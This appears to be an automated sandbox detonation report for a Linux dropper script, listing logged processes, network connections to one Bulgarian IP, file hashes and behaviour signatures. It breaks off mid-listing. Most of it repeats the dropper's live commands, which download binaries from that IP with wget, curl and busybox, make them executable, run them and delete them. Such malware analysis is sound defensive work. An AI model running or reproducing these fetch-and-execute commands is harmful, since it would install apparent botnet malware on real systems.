[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/chmod
[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF
[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/rm
[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/wget
[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/chmod
[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD
[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/bin/rm
[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]
/usr/bin/wget
[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/chmod
[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d
[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/bin/rm
[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]
/usr/bin/wget
[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/chmod
[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF
[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/bin/rm
[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]
/usr/bin/wget
[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/chmod
[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/rm
[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/wget
[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/chmod
[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/rm
[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/wget
[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/chmod
[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/rm
[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/wget
[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/chmod
[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/bin/rm
[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]
/usr/bin/wget
[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/chmod
[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/bin/rm
[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]
/usr/bin/wget
[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/chmod
[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/bin/rm
[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]
/usr/bin/wget
[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/chmod
[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8
[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/bin/rm
[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]
/usr/bin/wget
[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/chmod
[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/rm
[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/wget
[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/chmod
[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/rm
[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/wget
[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/chmod
[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/bin/rm
[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]
/usr/bin/wget
[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/chmod
[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
/bin/rm
[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 01:06
Reported
2024-10-28 01:09
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
130s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | N/A |
| N/A | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | N/A |
| N/A | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | N/A |
| N/A | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | N/A |
| N/A | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | N/A |
| N/A | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | N/A |
| N/A | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | N/A |
| N/A | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | N/A |
| N/A | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | N/A |
| N/A | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | N/A |
| N/A | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | N/A |
| N/A | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | N/A |
| N/A | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | N/A |
| N/A | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | N/A |
| N/A | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | N/A |
| N/A | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | N/A |
| N/A | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | N/A |
| N/A | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | N/A |
| N/A | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | N/A |
| N/A | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | N/A |
| N/A | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | N/A |
| N/A | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | N/A |
| N/A | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | N/A |
| N/A | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | N/A |
| N/A | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | N/A |
| N/A | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | N/A |
| N/A | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | N/A |
| N/A | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 | /usr/bin/curl | N/A |
Processes
/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/chmod
[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/bin/rm
[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]
/usr/bin/wget
[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/chmod
[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/bin/rm
[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]
/usr/bin/wget
[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/chmod
[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/bin/rm
[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]
/usr/bin/wget
[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/chmod
[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/bin/rm
[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]
/usr/bin/wget
[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]
/bin/chmod
